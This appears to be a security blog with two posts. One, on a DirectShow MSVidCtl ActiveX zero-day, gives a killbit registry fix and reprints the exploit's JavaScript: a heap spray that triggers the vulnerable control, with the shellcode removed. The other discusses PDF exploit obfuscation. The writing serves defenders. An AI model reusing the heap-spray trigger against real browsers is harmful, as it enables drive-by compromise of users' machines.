New 0-day in Microsoft DirectShow

There's news of a new 0-day exploit for Microsoft's MSVidCtl.DLL (DirectShow) doing the rounds. The exploit code is publicly available on several Chinese Web sites - so be careful. There'll be plenty of noise this week concerning this 0-day.

The CSIS site has some details - and I find it disconcerting that there was any expectation that AV would preemptively detect/stop this.

You can help protect against exploitation of this control by setting the killbit for it.

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\
ActiveX Compatibility\{0955AC62-BF2E-4CBA-A2B9-A63F772D46CF}]
"Compatibility Flags"=dword:00000400

Details of the exploit are available on the CSIS web site, but are included below:

var appllaa='0';
var nndx='%'+'u9'+'0'+'9'+'0'+'%u'+'9'+'0'+'9'+appllaa;
[SHELL CODE REMOVED]
var headersize=20;
var omybro=unescape(nndx);
var slackspace=headersize+dashell.length;
while(omybro.length omybro+=omybro;
bZmybr=omybro.substring(0,slackspace);
shuishiMVP=omybro.substring(0,omybro.length-slackspace);
while(shuishiMVP.length+slackspace<0x30000) shuishiMVP=shuishiMVP+shuishiMVP+bZmybr; memory=new Array();
for(x=0;x<300;x++) memory[x]=shuishiMVP+dashell;
var myObject=document.createElement('object');
DivID.appendChild(myObject);
myObject.width='1';
myObject.height='1';
myObject.data='./logo.gif';
myObject.classid='clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';

Obfuscated PDF Exploits

This year has seen a flurry of PDF related vulnerabilities and exploits circulating (several of them being zero-day). The specifics of the vulnerabilities vary marginally, but all-in-all I'd attribute the source to be Adobe trying to do too much with their portable document format without due consideration for the complexity they are introducing to the format. That complexity is coming back and biting both Adobe and everyone obliged to have Acrobat installed on their system.

I know that Adobe make reasonable investments in their security QA and even employ some of some of the best consulting bug-hunters out there today. However, the complexity of their product - in particular their rapidly evolving scripting language support - is turning in to a real pain in the arse.

Casting that pain-point aside, it's been interesting studying the exploit techniques being used by the bad guys leveraging the vulnerabilities within the Acrobat PDF format. As with most exploits, copy-paste is rife with (by my estimation) the majority of "new" attacks being tweaks to existing exploits or techniques - which is practically verbatim for all Web browser exploits.

Sticking with the decade of Web browser exploit evolution as a yard stick, we're only now just seeing some of what I'd call "advanced" script obfuscation techniques making their way to the PDF exploits. I think a lot of it has to do with the fact that most perimeter defence technologies have now incorporated good PDF document parsers and can see deeper in to the files (early on the PDF content was just "some kind of file" and it was simple strings matching).

The results are some interesting obfuscation techniques particular to PDF's rather than generic HTML-based JavaScript. For the time being these obfuscation techniques are specific to their authors (i.e. little copy-paste going on) so can serve as decent markers of their origination point. In the longer run, the copy-paste brigade will muddy those waters - and perhaps the best-of-the-best will become metamorphic creation tools by the end of the year.

If you're after a little more reading on the subject, the folks over at WebSense have posted a nice blog today titled Complex obfuscated PDF exploit.